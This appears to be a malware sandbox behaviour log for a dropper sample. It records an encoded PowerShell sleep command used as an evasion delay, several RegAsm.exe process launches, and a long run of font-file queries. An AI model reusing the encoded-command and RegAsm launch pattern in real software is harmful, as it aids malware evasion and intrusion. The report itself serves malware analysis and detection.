                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
